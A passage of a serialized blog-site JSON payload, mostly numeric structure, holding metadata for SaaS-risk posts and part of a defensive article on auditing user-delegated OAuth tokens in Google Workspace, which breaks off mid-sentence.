a":337932,"content":337933,"nodeType":178},{},[337934],{"data":337935,"marks":337936,"value":322201,"nodeType":173},{},[],{"data":337938,"content":337939,"nodeType":254},{},[337940],{"data":337941,"content":337942,"nodeType":178},{},[337943],{"data":337944,"marks":337945,"value":322211,"nodeType":173},{},[],{"data":337947,"content":337948,"nodeType":254},{},[337949],{"data":337950,"content":337951,"nodeType":178},{},[337952],{"data":337953,"marks":337954,"value":322221,"nodeType":173},{},[],{"data":337956,"content":337957,"nodeType":254},{},[337958],{"data":337959,"content":337960,"nodeType":178},{},[337961],{"data":337962,"marks":337963,"value":322231,"nodeType":173},{},[],{"data":337965,"content":337966,"nodeType":178},{},[337967,337970,337978],{"data":337968,"marks":337969,"value":322238,"nodeType":173},{},[],{"data":337971,"content":337974,"nodeType":1698},{"target":337972},{"sys":337973},{"id":283466,"type":317,"linkType":318},[337975],{"data":337976,"marks":337977,"value":322247,"nodeType":173},{},[],{"data":337979,"marks":337980,"value":322251,"nodeType":173},{},[],{"data":337982,"content":337983,"nodeType":178},{},[337984,337987,337993],{"data":337985,"marks":337986,"value":322258,"nodeType":173},{},[],{"data":337988,"content":337989,"nodeType":186},{"uri":296864},[337990],{"data":337991,"marks":337992,"value":287472,"nodeType":173},{},[],{"data":337994,"marks":337995,"value":322268,"nodeType":173},{},[],{"data":337997,"content":337998,"nodeType":169},{},[337999],{"data":338000,"marks":338001,"value":322275,"nodeType":173},{},[],{"data":338003,"content":338004,"nodeType":178},{},[338005],{"data":338006,"marks":338007,"value":322282,"nodeType":173},{},[],{"data":338009,"content":338010,"nodeType":178},{},[338011],{"data":338012,"marks":338013,"value":322289,"nodeType":173},{},[],{"data":338015,"content":338018,"nodeType":312},{"target":338016},{"sys":338017},{"id":322294,"type":317,"linkType":318},[],{"data":338020,"content":338021,"nodeType":178},{},[338022],{"data":338023,"marks":338024,"value":322302,"nodeType":173},{},[],{"data":338026,"content":338027,"nodeType":178},{},[338028],{"data":338029,"marks":338030,"value":322309,"nodeType":173},{},[],{"data":338032,"content":338033,"nodeType":178},{},[338034,338037,338044],{"data":338035,"marks":338036,"value":37,"nodeType":173},{},[],{"data":338038,"content":338039,"nodeType":186},{"uri":322318},[338040],{"data":338041,"marks":338042,"value":322324,"nodeType":173},{},[338043],{"type":194},{"data":338045,"marks":338046,"value":322328,"nodeType":173},{},[],{"entries":338048},{"inline":338049,"hyperlink":338050,"block":338053},[],[338051],{"sys":338052,"__typename":1528,"title":297416,"slug":297419},{"id":283466},[338054],{"sys":338055,"__typename":5345,"title":338056,"caption":118,"layoutMode":118,"file":338057},{"id":322294},"User privacy screenshot",{"url":338058,"width":338059,"height":182517},"https://images.ctfassets.net/y1cdw1ablpvd/6y7ZPjWSXkqKuX0WW901HD/03a716aac860f7d460a6ba0ec6df8d86/image1.png",762,"content:blog:how-to-discover-saas-use-without-invading-employee-privacy.json","blog/how-to-discover-saas-use-without-invading-employee-privacy.json","blog/how-to-discover-saas-use-without-invading-employee-privacy",{"_path":338064,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":338065,"ogImage":118,"summary":338067,"title":297416,"subtitle":118,"metaTitle":338078,"synopsis":297417,"hashTags":118,"publishedDate":297418,"slug":297419,"tagsCollection":338079,"relatedBlogPostsCollection":338085,"authorsCollection":339364,"content":339368,"_id":339906,"_type":5439,"_source":5440,"_file":339907,"_stem":339908,"_extension":5439},"/blog/manage-saas-risks-without-hindering-employees",{"id":283466,"publishedAt":338066},"2024-10-01T12:37:37.860Z",{"json":338068},{"data":338069,"content":338070,"nodeType":165},{},[338071],{"data":338072,"content":338073,"nodeType":178},{},[338074],{"data":338075,"marks":338076,"value":338077,"nodeType":173},{},[],"In this post, we're focusing on what to do after you've unearthed all the SaaS apps employees are using. SaaS discovery is only part of the process. What happens next is what leads to actual security improvements.","Manage the risk of unsanctioned SaaS in 5 steps",{"items":338080},[338081,338083],{"sys":338082,"name":274157},{"id":274156},{"sys":338084,"name":26133},{"id":26132},{"items":338086},[338087,338580,338966],{"__typename":1528,"sys":338088,"content":338089,"title":298859,"synopsis":320972,"hashTags":338569,"publishedDate":320979,"slug":298860,"tagsCollection":338570,"authorsCollection":338576},{"id":282056},{"json":338090},{"data":338091,"content":338092,"nodeType":165},{},[338093,338099,338105,338111,338117,338123,338143,338149,338155,338161,338167,338177,338183,338217,338237,338243,338249,338263,338269,338275,338288,338294,338301,338314,338320,338326,338332,338339,338345,338351,338357,338379,338436,338442,338448,338454,338467,338473,338486,338492,338502,338508,338525,338530,338545],{"data":338094,"content":338095,"nodeType":178},{},[338096],{"data":338097,"marks":338098,"value":320422,"nodeType":173},{},[],{"data":338100,"content":338101,"nodeType":178},{},[338102],{"data":338103,"marks":338104,"value":320429,"nodeType":173},{},[],{"data":338106,"content":338107,"nodeType":169},{},[338108],{"data":338109,"marks":338110,"value":320436,"nodeType":173},{},[],{"data":338112,"content":338113,"nodeType":178},{},[338114],{"data":338115,"marks":338116,"value":320443,"nodeType":173},{},[],{"data":338118,"content":338119,"nodeType":178},{},[338120],{"data":338121,"marks":338122,"value":320450,"nodeType":173},{},[],{"data":338124,"content":338125,"nodeType":178},{},[338126,338129,338133,338136,338140],{"data":338127,"marks":338128,"value":320457,"nodeType":173},{},[],{"data":338130,"marks":338131,"value":320462,"nodeType":173},{},[338132],{"type":1646},{"data":338134,"marks":338135,"value":320466,"nodeType":173},{},[],{"data":338137,"marks":338138,"value":320471,"nodeType":173},{},[338139],{"type":1646},{"data":338141,"marks":338142,"value":320475,"nodeType":173},{},[],{"data":338144,"content":338145,"nodeType":178},{},[338146],{"data":338147,"marks":338148,"value":320482,"nodeType":173},{},[],{"data":338150,"content":338151,"nodeType":169},{},[338152],{"data":338153,"marks":338154,"value":320489,"nodeType":173},{},[],{"data":338156,"content":338157,"nodeType":178},{},[338158],{"data":338159,"marks":338160,"value":320496,"nodeType":173},{},[],{"data":338162,"content":338163,"nodeType":169},{},[338164],{"data":338165,"marks":338166,"value":320503,"nodeType":173},{},[],{"data":338168,"content":338169,"nodeType":178},{},[338170,338173],{"data":338171,"marks":338172,"value":13836,"nodeType":173},{},[],{"data":338174,"marks":338175,"value":320514,"nodeType":173},{},[338176],{"type":1646},{"data":338178,"content":338179,"nodeType":178},{},[338180],{"data":338181,"marks":338182,"value":320521,"nodeType":173},{},[],{"data":338184,"content":338185,"nodeType":178},{},[338186,338189,338193,338196,338200,338203,338207,338210,338214],{"data":338187,"marks":338188,"value":320528,"nodeType":173},{},[],{"data":338190,"marks":338191,"value":320462,"nodeType":173},{},[338192],{"type":1646},{"data":338194,"marks":338195,"value":320536,"nodeType":173},{},[],{"data":338197,"marks":338198,"value":320541,"nodeType":173},{},[338199],{"type":1646},{"data":338201,"marks":338202,"value":320545,"nodeType":173},{},[],{"data":338204,"marks":338205,"value":320462,"nodeType":173},{},[338206],{"type":1646},{"data":338208,"marks":338209,"value":320553,"nodeType":173},{},[],{"data":338211,"marks":338212,"value":320471,"nodeType":173},{},[338213],{"type":1646},{"data":338215,"marks":338216,"value":1477,"nodeType":173},{},[],{"data":338218,"content":338219,"nodeType":178},{},[338220,338223,338227,338230,338234],{"data":338221,"marks":338222,"value":320567,"nodeType":173},{},[],{"data":338224,"marks":338225,"value":320572,"nodeType":173},{},[338226],{"type":1646},{"data":338228,"marks":338229,"value":320576,"nodeType":173},{},[],{"data":338231,"marks":338232,"value":320581,"nodeType":173},{},[338233],{"type":1646},{"data":338235,"marks":338236,"value":320585,"nodeType":173},{},[],{"data":338238,"content":338239,"nodeType":178},{},[338240],{"data":338241,"marks":338242,"value":320592,"nodeType":173},{},[],{"data":338244,"content":338245,"nodeType":169},{},[338246],{"data":338247,"marks":338248,"value":320599,"nodeType":173},{},[],{"data":338250,"content":338251,"nodeType":178},{},[338252,338256,338259],{"data":338253,"marks":338254,"value":320607,"nodeType":173},{},[338255],{"type":1646},{"data":338257,"marks":338258,"value":3107,"nodeType":173},{},[],{"data":338260,"marks":338261,"value":320615,"nodeType":173},{},[338262],{"type":1646},{"data":338264,"content":338265,"nodeType":178},{},[338266],{"data":338267,"marks":338268,"value":320622,"nodeType":173},{},[],{"data":338270,"content":338271,"nodeType":178},{},[338272],{"data":338273,"marks":338274,"value":320629,"nodeType":173},{},[],{"data":338276,"content":338277,"nodeType":178},{},[338278,338281,338285],{"data":338279,"marks":338280,"value":320636,"nodeType":173},{},[],{"data":338282,"marks":338283,"value":320641,"nodeType":173},{},[338284],{"type":1646},{"data":338286,"marks":338287,"value":320645,"nodeType":173},{},[],{"data":338289,"content":338290,"nodeType":169},{},[338291],{"data":338292,"marks":338293,"value":320652,"nodeType":173},{},[],{"data":338295,"content":338296,"nodeType":178},{},[338297],{"data":338298,"marks":338299,"value":320660,"nodeType":173},{},[338300],{"type":1646},{"data":338302,"content":338303,"nodeType":178},{},[338304,338307,338311],{"data":338305,"marks":338306,"value":320667,"nodeType":173},{},[],{"data":338308,"marks":338309,"value":320672,"nodeType":173},{},[338310],{"type":1646},{"data":338312,"marks":338313,"value":320676,"nodeType":173},{},[],{"data":338315,"content":338316,"nodeType":178},{},[338317],{"data":338318,"marks":338319,"value":320683,"nodeType":173},{},[],{"data":338321,"content":338322,"nodeType":178},{},[338323],{"data":338324,"marks":338325,"value":320690,"nodeType":173},{},[],{"data":338327,"content":338328,"nodeType":169},{},[338329],{"data":338330,"marks":338331,"value":320697,"nodeType":173},{},[],{"data":338333,"content":338334,"nodeType":178},{},[338335],{"data":338336,"marks":338337,"value":320705,"nodeType":173},{},[338338],{"type":1646},{"data":338340,"content":338341,"nodeType":178},{},[338342],{"data":338343,"marks":338344,"value":320712,"nodeType":173},{},[],{"data":338346,"content":338347,"nodeType":178},{},[338348],{"data":338349,"marks":338350,"value":320719,"nodeType":173},{},[],{"data":338352,"content":338353,"nodeType":178},{},[338354],{"data":338355,"marks":338356,"value":320726,"nodeType":173},{},[],{"data":338358,"content":338359,"nodeType":178},{},[338360,338363,338367,338370,338376],{"data":338361,"marks":338362,"value":320733,"nodeType":173},{},[],{"data":338364,"marks":338365,"value":221172,"nodeType":173},{},[338366],{"type":370},{"data":338368,"marks":338369,"value":320741,"nodeType":173},{},[],{"data":338371,"content":338372,"nodeType":186},{"uri":320744},[338373],{"data":338374,"marks":338375,"value":320749,"nodeType":173},{},[],{"data":338377,"marks":338378,"value":320753,"nodeType":173},{},[],{"data":338380,"content":338381,"nodeType":250},{},[338382,338391,338400,338409,338418,338427],{"data":338383,"content":338384,"nodeType":254},{},[338385],{"data":338386,"content":338387,"nodeType":178},{},[338388],{"data":338389,"marks":338390,"value":320766,"nodeType":173},{},[],{"data":338392,"content":338393,"nodeType":254},{},[338394],{"data":338395,"content":338396,"nodeType":178},{},[338397],{"data":338398,"marks":338399,"value":320776,"nodeType":173},{},[],{"data":338401,"content":338402,"nodeType":254},{},[338403],{"data":338404,"content":338405,"nodeType":178},{},[338406],{"data":338407,"marks":338408,"value":320786,"nodeType":173},{},[],{"data":338410,"content":338411,"nodeType":254},{},[338412],{"data":338413,"content":338414,"nodeType":178},{},[338415],{"data":338416,"marks":338417,"value":320796,"nodeType":173},{},[],{"data":338419,"content":338420,"nodeType":254},{},[338421],{"data":338422,"content":338423,"nodeType":178},{},[338424],{"data":338425,"marks":338426,"value":320806,"nodeType":173},{},[],{"data":338428,"content":338429,"nodeType":254},{},[338430],{"data":338431,"content":338432,"nodeType":178},{},[338433],{"data":338434,"marks":338435,"value":320816,"nodeType":173},{},[],{"data":338437,"content":338438,"nodeType":178},{},[338439],{"data":338440,"marks":338441,"value":320823,"nodeType":173},{},[],{"data":338443,"content":338444,"nodeType":178},{},[338445],{"data":338446,"marks":338447,"value":320830,"nodeType":173},{},[],{"data":338449,"content":338450,"nodeType":169},{},[338451],{"data":338452,"marks":338453,"value":309064,"nodeType":173},{},[],{"data":338455,"content":338456,"nodeType":178},{},[338457,338460,338464],{"data":338458,"marks":338459,"value":320843,"nodeType":173},{},[],{"data":338461,"marks":338462,"value":320848,"nodeType":173},{},[338463],{"type":1646},{"data":338465,"marks":338466,"value":320852,"nodeType":173},{},[],{"data":338468,"content":338469,"nodeType":235},{},[338470],{"data":338471,"marks":338472,"value":320859,"nodeType":173},{},[],{"data":338474,"content":338475,"nodeType":178},{},[338476,338479,338483],{"data":338477,"marks":338478,"value":320866,"nodeType":173},{},[],{"data":338480,"marks":338481,"value":320871,"nodeType":173},{},[338482],{"type":1646},{"data":338484,"marks":338485,"value":320875,"nodeType":173},{},[],{"data":338487,"content":338488,"nodeType":178},{},[338489],{"data":338490,"marks":338491,"value":320882,"nodeType":173},{},[],{"data":338493,"content":338494,"nodeType":178},{},[338495,338499],{"data":338496,"marks":338497,"value":320890,"nodeType":173},{},[338498],{"type":1646},{"data":338500,"marks":338501,"value":320894,"nodeType":173},{},[],{"data":338503,"content":338504,"nodeType":178},{},[338505],{"data":338506,"marks":338507,"value":320901,"nodeType":173},{},[],{"data":338509,"content":338510,"nodeType":178},{},[338511,338515,338518,338522],{"data":338512,"marks":338513,"value":320909,"nodeType":173},{},[338514],{"type":1646},{"data":338516,"marks":338517,"value":320913,"nodeType":173},{},[],{"data":338519,"marks":338520,"value":320918,"nodeType":173},{},[338521],{"type":1646},{"data":338523,"marks":338524,"value":10557,"nodeType":173},{},[],{"data":338526,"content":338529,"nodeType":312},{"target":338527},{"sys":338528},{"id":320926,"type":317,"linkType":318},[],{"data":338531,"content":338532,"nodeType":178},{},[338533,338536,338542],{"data":338534,"marks":338535,"value":320934,"nodeType":173},{},[],{"data":338537,"content":338538,"nodeType":186},{"uri":320744},[338539],{"data":338540,"marks":338541,"value":320941,"nodeType":173},{},[],{"data":338543,"marks":338544,"value":1477,"nodeType":173},{},[],{"data":338546,"content":338547,"nodeType":178},{},[338548,338551,338557,338560,338566],{"data":338549,"marks":338550,"value":320951,"nodeType":173},{},[],{"data":338552,"content":338553,"nodeType":186},{"uri":117883},[338554],{"data":338555,"marks":338556,"value":320958,"nodeType":173},{},[],{"data":338558,"marks":338559,"value":1464,"nodeType":173},{},[],{"data":338561,"content":338562,"nodeType":186},{"uri":117869},[338563],{"data":338564,"marks":338565,"value":117876,"nodeType":173},{},[],{"data":338567,"marks":338568,"value":320971,"nodeType":173},{},[],[320974,320975,320976,320977,320978],{"items":338571},[338572,338574],{"sys":338573,"name":274157},{"id":274156},{"sys":338575,"name":26137},{"id":26136},{"items":338577},[338578],{"fullName":13977,"firstName":13978,"jobTitle":13979,"profilePicture":338579},{"url":13981},{"__typename":1528,"sys":338581,"content":338582,"title":334369,"synopsis":334370,"hashTags":118,"publishedDate":334371,"slug":334372,"tagsCollection":338956,"authorsCollection":338962},{"id":333925},{"json":338583},{"data":338584,"content":338585,"nodeType":165},{},[338586,338612,338615,338621,338627,338632,338638,338651,338657,338663,338679,338729,338732,338738,338793,338806,338812,338818,338834,338840,338857,338863,338869,338875,338881,338887,338893,338898,338904,338910,338923,338926,338941],{"data":338587,"content":338588,"nodeType":178},{},[338589,338592,338599,338602,338609],{"data":338590,"marks":338591,"value":333936,"nodeType":173},{},[],{"data":338593,"content":338594,"nodeType":186},{"uri":333939},[338595],{"data":338596,"marks":338597,"value":333945,"nodeType":173},{},[338598],{"type":194},{"data":338600,"marks":338601,"value":333949,"nodeType":173},{},[],{"data":338603,"content":338604,"nodeType":186},{"uri":331178},[338605],{"data":338606,"marks":338607,"value":333957,"nodeType":173},{},[338608],{"type":194},{"data":338610,"marks":338611,"value":333961,"nodeType":173},{},[],{"data":338613,"content":338614,"nodeType":231},{},[],{"data":338616,"content":338617,"nodeType":178},{},[338618],{"data":338619,"marks":338620,"value":333971,"nodeType":173},{},[],{"data":338622,"content":338623,"nodeType":178},{},[338624],{"data":338625,"marks":338626,"value":333978,"nodeType":173},{},[],{"data":338628,"content":338631,"nodeType":312},{"target":338629},{"sys":338630},{"id":271484,"type":317,"linkType":318},[],{"data":338633,"content":338634,"nodeType":178},{},[338635],{"data":338636,"marks":338637,"value":333990,"nodeType":173},{},[],{"data":338639,"content":338640,"nodeType":178},{},[338641,338644,338648],{"data":338642,"marks":338643,"value":333997,"nodeType":173},{},[],{"data":338645,"marks":338646,"value":334002,"nodeType":173},{},[338647],{"type":370},{"data":338649,"marks":338650,"value":334006,"nodeType":173},{},[],{"data":338652,"content":338653,"nodeType":178},{},[338654],{"data":338655,"marks":338656,"value":334013,"nodeType":173},{},[],{"data":338658,"content":338659,"nodeType":178},{},[338660],{"data":338661,"marks":338662,"value":334020,"nodeType":173},{},[],{"data":338664,"content":338665,"nodeType":178},{},[338666,338669,338676],{"data":338667,"marks":338668,"value":334027,"nodeType":173},{},[],{"data":338670,"content":338671,"nodeType":186},{"uri":334030},[338672],{"data":338673,"marks":338674,"value":334036,"nodeType":173},{},[338675],{"type":194},{"data":338677,"marks":338678,"value":334040,"nodeType":173},{},[],{"data":338680,"content":338681,"nodeType":250},{},[338682,338701,338720],{"data":338683,"content":338684,"nodeType":254},{},[338685],{"data":338686,"content":338687,"nodeType":178},{},[338688,338691,338698],{"data":338689,"marks":338690,"value":334053,"nodeType":173},{},[],{"data":338692,"content":338693,"nodeType":186},{"uri":318327},[338694],{"data":338695,"marks":338696,"value":334061,"nodeType":173},{},[338697],{"type":194},{"data":338699,"marks":338700,"value":53584,"nodeType":173},{},[],{"data":338702,"content":338703,"nodeType":254},{},[338704],{"data":338705,"content":338706,"nodeType":178},{},[338707,338710,338717],{"data":338708,"marks":338709,"value":334074,"nodeType":173},{},[],{"data":338711,"content":338712,"nodeType":186},{"uri":334077},[338713],{"data":338714,"marks":338715,"value":334083,"nodeType":173},{},[338716],{"type":194},{"data":338718,"marks":338719,"value":334087,"nodeType":173},{},[],{"data":338721,"content":338722,"nodeType":254},{},[338723],{"data":338724,"content":338725,"nodeType":178},{},[338726],{"data":338727,"marks":338728,"value":334097,"nodeType":173},{},[],{"data":338730,"content":338731,"nodeType":231},{},[],{"data":338733,"content":338734,"nodeType":178},{},[338735],{"data":338736,"marks":338737,"value":334107,"nodeType":173},{},[],{"data":338739,"content":338740,"nodeType":178},{},[338741,338744,338751,338754,338761,338764,338771,338774,338781,338784,338790],{"data":338742,"marks":338743,"value":334114,"nodeType":173},{},[],{"data":338745,"content":338746,"nodeType":186},{"uri":334117},[338747],{"data":338748,"marks":338749,"value":334123,"nodeType":173},{},[338750],{"type":194},{"data":338752,"marks":338753,"value":334127,"nodeType":173},{},[],{"data":338755,"content":338756,"nodeType":186},{"uri":334130},[338757],{"data":338758,"marks":338759,"value":334136,"nodeType":173},{},[338760],{"type":194},{"data":338762,"marks":338763,"value":334140,"nodeType":173},{},[],{"data":338765,"content":338766,"nodeType":186},{"uri":334143},[338767],{"data":338768,"marks":338769,"value":334149,"nodeType":173},{},[338770],{"type":194},{"data":338772,"marks":338773,"value":3949,"nodeType":173},{},[],{"data":338775,"content":338776,"nodeType":186},{"uri":334155},[338777],{"data":338778,"marks":338779,"value":334161,"nodeType":173},{},[338780],{"type":194},{"data":338782,"marks":338783,"value":334165,"nodeType":173},{},[],{"data":338785,"content":338786,"nodeType":186},{"uri":271579},[338787],{"data":338788,"marks":338789,"value":334172,"nodeType":173},{},[],{"data":338791,"marks":338792,"value":334176,"nodeType":173},{},[],{"data":338794,"content":338795,"nodeType":178},{},[338796,338799,338803],{"data":338797,"marks":338798,"value":334183,"nodeType":173},{},[],{"data":338800,"marks":338801,"value":334188,"nodeType":173},{},[338802],{"type":370},{"data":338804,"marks":338805,"value":334192,"nodeType":173},{},[],{"data":338807,"content":338808,"nodeType":178},{},[338809],{"data":338810,"marks":338811,"value":334199,"nodeType":173},{},[],{"data":338813,"content":338814,"nodeType":235},{},[338815],{"data":338816,"marks":338817,"value":334206,"nodeType":173},{},[],{"data":338819,"content":338820,"nodeType":178},{},[338821,338824,338831],{"data":338822,"marks":338823,"value":334213,"nodeType":173},{},[],{"data":338825,"content":338826,"nodeType":186},{"uri":334216},[338827],{"data":338828,"marks":338829,"value":334222,"nodeType":173},{},[338830],{"type":194},{"data":338832,"marks":338833,"value":197,"nodeType":173},{},[],{"data":338835,"content":338836,"nodeType":235},{},[338837],{"data":338838,"marks":338839,"value":334232,"nodeType":173},{},[],{"data":338841,"content":338842,"nodeType":178},{},[338843,338846,338854],{"data":338844,"marks":338845,"value":334239,"nodeType":173},{},[],{"data":338847,"content":338850,"nodeType":1698},{"target":338848},{"sys":338849},{"id":334244,"type":317,"linkType":318},[338851],{"data":338852,"marks":338853,"value":334249,"nodeType":173},{},[],{"data":338855,"marks":338856,"value":1477,"nodeType":173},{},[],{"data":338858,"content":338859,"nodeType":235},{},[338860],{"data":338861,"marks":338862,"value":334259,"nodeType":173},{},[],{"data":338864,"content":338865,"nodeType":178},{},[338866],{"data":338867,"marks":338868,"value":334266,"nodeType":173},{},[],{"data":338870,"content":338871,"nodeType":178},{},[338872],{"data":338873,"marks":338874,"value":334273,"nodeType":173},{},[],{"data":338876,"content":338877,"nodeType":235},{},[338878],{"data":338879,"marks":338880,"value":334280,"nodeType":173},{},[],{"data":338882,"content":338883,"nodeType":178},{},[338884],{"data":338885,"marks":338886,"value":334287,"nodeType":173},{},[],{"data":338888,"content":338889,"nodeType":178},{},[338890],{"data":338891,"marks":338892,"value":334294,"nodeType":173},{},[],{"data":338894,"content":338897,"nodeType":312},{"target":338895},{"sys":338896},{"id":334299,"type":317,"linkType":318},[],{"data":338899,"content":338900,"nodeType":235},{},[338901],{"data":338902,"marks":338903,"value":334307,"nodeType":173},{},[],{"data":338905,"content":338906,"nodeType":178},{},[338907],{"data":338908,"marks":338909,"value":334314,"nodeType":173},{},[],{"data":338911,"content":338912,"nodeType":178},{},[338913,338916,338920],{"data":338914,"marks":338915,"value":334321,"nodeType":173},{},[],{"data":338917,"marks":338918,"value":334326,"nodeType":173},{},[338919],{"type":1646},{"data":338921,"marks":338922,"value":334330,"nodeType":173},{},[],{"data":338924,"content":338925,"nodeType":231},{},[],{"data":338927,"content":338928,"nodeType":178},{},[338929,338932,338938],{"data":338930,"marks":338931,"value":334340,"nodeType":173},{},[],{"data":338933,"content":338934,"nodeType":186},{"uri":334343},[338935],{"data":338936,"marks":338937,"value":334123,"nodeType":173},{},[],{"data":338939,"marks":338940,"value":334351,"nodeType":173},{},[],{"data":338942,"content":338943,"nodeType":178},{},[338944,338947,338953],{"data":338945,"marks":338946,"value":334358,"nodeType":173},{},[],{"data":338948,"content":338949,"nodeType":186},{"uri":271579},[338950],{"data":338951,"marks":338952,"value":334365,"nodeType":173},{},[],{"data":338954,"marks":338955,"value":37,"nodeType":173},{},[],{"items":338957},[338958,338960],{"sys":338959,"name":26137},{"id":26136},{"sys":338961,"name":509},{"id":508},{"items":338963},[338964],{"fullName":19125,"firstName":19126,"jobTitle":19127,"profilePicture":338965},{"url":19129},{"__typename":1528,"sys":338967,"content":338969,"title":339344,"synopsis":339345,"hashTags":339346,"publishedDate":339352,"slug":339353,"tagsCollection":339354,"authorsCollection":339360},{"id":338968},"4j5GhBaGwP92nz5p6gmQyi",{"json":338970},{"data":338971,"content":338972,"nodeType":165},{},[338973,338980,338987,338994,339000,339007,339014,339021,339054,339061,339068,339086,339092,339099,339106,339124,339130,339137,339156,339162,339197,339225,339231,339246,339273,339279,339286,339293,339299,339324,339331,339338],{"data":338974,"content":338975,"nodeType":235},{},[338976],{"data":338977,"marks":338978,"value":338979,"nodeType":173},{},[],"What are user delegated OAuth tokens?",{"data":338981,"content":338982,"nodeType":178},{},[338983],{"data":338984,"marks":338985,"value":338986,"nodeType":173},{},[],"When users want to integrate a 3rd party app (like Zoom, Slack, Zapier, etc. etc.) with Google Workspace (or Office 365, or almost any SaaS platform these days really), they provide that app with a token (an OAuth2 token to be specific). This token can be used by the 3rd party to connect to your Workspace to gain access to that user’s data instead of a password.",{"data":338988,"content":338989,"nodeType":178},{},[338990],{"data":338991,"marks":338992,"value":338993,"nodeType":173},{},[],"You might recognise screens like this which actually do the job of granting these tokens.",{"data":338995,"content":338999,"nodeType":312},{"target":338996},{"sys":338997},{"id":338998,"type":317,"linkType":318},"1jj3BNK8zO0Pm83LwzLUJp",[],{"data":339001,"content":339002,"nodeType":178},{},[339003],{"data":339004,"marks":339005,"value":339006,"nodeType":173},{},[],"That list of permissions is a human readable version of what are called scopes. Scopes limit what the 3rd party can do with the token. There are a number of ways you can limit the 3rd parties and scopes your users can authorise, and we’ll cover those in future blog posts - for now we are focussing on the existing tokens that have already been granted.",{"data":339008,"content":339009,"nodeType":235},{},[339010],{"data":339011,"marks":339012,"value":339013,"nodeType":173},{},[],"Why would you want to review these apps and tokens?",{"data":339015,"content":339016,"nodeType":178},{},[339017],{"data":339018,"marks":339019,"value":339020,"nodeType":173},{},[],"Essentially there are quite a few things that can go wrong here, which is not unexpected when we are talking about granting 3rd parties access to a core business platform like Workspace - and perhaps in something like an ordering of obviousness they are things like:",{"data":339022,"content":339023,"nodeType":250},{},[339024,339034,339044],{"data":339025,"content":339026,"nodeType":254},{},[339027],{"data":339028,"content":339029,"nodeType":178},{},[339030],{"data":339031,"marks":339032,"value":339033,"nodeType":173},{},[],"Consent phishing - where an attacker uses a malicious app linked in an email to trick users into giving them access to the user's data.",{"data":339035,"content":339036,"nodeType":254},{},[339037],{"data":339038,"content":339039,"nodeType":178},{},[339040],{"data":339041,"marks":339042,"value":339043,"nodeType":173},{},[],"Useful but malicious apps - as we’ve seen recently in browser extensions (especially chrome), mobile apps (especially android, pattern forming here?), PC software, etc. etc. there are a number of criminals who develop legitimately useful (or at least vaguely useful looking) software that is also used to get backdoor access to your data. This is even harder to spot in SaaS applications, because unlike browser extensions or mobile apps, you can’t inspect the code. And because Almost no SaaS apps expose good logs of what is done using these tokens, you can’t inspect what they are doing.",{"data":339045,"content":339046,"nodeType":254},{},[339047],{"data":339048,"content":339049,"nodeType":178},{},[339050],{"data":339051,"marks":339052,"value":339053,"nodeType":173},{},[],"Supply chain - while supply chain attacks are all the rage these days, we’ve yet to see a really clear attack where an attacker has stolen specifically OAuth tokens from one of these 3rd parties and used them against their customers - at least to my knowledge (please tweet my wrongness @jacques_sec). This does not however mean this can’t or won’t happen - and in fact I’d be super surprised if this doesn’t happen in the next few years.",{"data":339055,"content":339056,"nodeType":178},{},[339057],{"data":339058,"marks":339059,"value":339060,"nodeType":173},{},[],"While there are a lot of things you might want to look at when reviewing an OAuth app, you will at least want to know who owns/publishes the app (who have you delegated access too), what permissions or access the 3rd party has to your data, and whether Google has reviewed and verified the app - so let’s use this blog to focus on that starting point.",{"data":339062,"content":339063,"nodeType":235},{},[339064],{"data":339065,"marks":339066,"value":339067,"nodeType":173},{},[],"Getting the basic token details",{"data":339069,"content":339070,"nodeType":178},{},[339071,339075,339082],{"data":339072,"marks":339073,"value":339074,"nodeType":173},{},[],"As a user you can look at ",{"data":339076,"content":339077,"nodeType":186},{"uri":271509},[339078],{"data":339079,"marks":339080,"value":339081,"nodeType":173},{},[],"your own Workspace tokens",{"data":339083,"marks":339084,"value":339085,"nodeType":173},{},[]," - where you’ll see a box like this for each integrated app:",{"data":339087,"content":339091,"nodeType":312},{"target":339088},{"sys":339089},{"id":339090,"type":317,"linkType":318},"4uswW6ogq8Gqn6ithrAa5d",[],{"data":339093,"content":339094,"nodeType":178},{},[339095],{"data":339096,"marks":339097,"value":339098,"nodeType":173},{},[],"You’ll see things like the authorised domain (diagrams.net in this case), the homepage of the app, and a description of the permissions granted by the scopes (though not the raw scopes themselves). Unfortunately, fairly basic information, like if the app has been verified by google is not available.",{"data":339100,"content":339101,"nodeType":178},{},[339102],{"data":339103,"marks":339104,"value":339105,"nodeType":173},{},[],"This page is also only available to view your own apps. Rather than trying to teach each of your users how to review OAuth apps, you may want to review these on behalf of your users, and let them get on with their jobs leaving your relationship with them intact. Google anticipated this, and actually allows you to get a list of these apps (or rather the tokens that grant them access) through the admin console in a couple of ways.",{"data":339107,"content":339108,"nodeType":178},{},[339109,339112,339120],{"data":339110,"marks":339111,"value":320733,"nodeType":173},{},[],{"data":339113,"content":339115,"nodeType":186},{"uri":339114},"https://admin.google.com/ac/users",[339116],{"data":339117,"marks":339118,"value":339119,"nodeType":173},{},[],"open a user’s profile in the admin console",{"data":339121,"marks":339122,"value":339123,"nodeType":173},{},[]," and click “connected applications” you’ll get something like this:",{"data":339125,"content":339129,"nodeType":312},{"target":339126},{"sys":339127},{"id":339128,"type":317,"linkType":318},"5EyCKXIf9ODUsVakm4bhnn",[],{"data":339131,"content":339132,"nodeType":178},{},[339133],{"data":339134,"marks":339135,"value":339136,"nodeType":173},{},[],"Beyond having to do this one user at a time - this is useful to see the display name for the application and the services which the app has access to. Unfortunately there is no information to show if the app has been verified by Google, and even worse nothing that links it to a specific publisher. At Push we publish quite a few apps ourselves I can tell you that the display name (“Google APIs Explorer” or “Slack” in the above example) is anything the author chooses, and so isn’t reliable at all unless the app has been verified (I’m assuming Google would reject look-alike or spoofed names here), but again you can’t tell here if the app has been verified by google - so on we go!",{"data":339138,"content":339139,"nodeType":178},{},[339140,339144,339152],{"data":339141,"marks":339142,"value":339143,"nodeType":173},{},[],"The admin console also provides ",{"data":339145,"content":339147,"nodeType":186},{"uri":339146},"https://admin.google.com/ac/reporting/audit/token",[339148],{"data":339149,"marks":339150,"value":339151,"nodeType":173},{},[],"security reports on token grants",{"data":339153,"marks":339154,"value":339155,"nodeType":173},{},[]," that look something like this:",{"data":339157,"content":339161,"nodeType":312},{"target":339158},{"sys":339159},{"id":339160,"type":317,"linkType":318},"6BygfA5C7GNzYZVkfP8du",[],{"data":339163,"content":339164,"nodeType":178},{},[339165,339169,339176,339180,339185,339189,339193],{"data":339166,"marks":339167,"value":339168,"nodeType":173},{},[],"Here we can see the raw scopes (you can find more info about 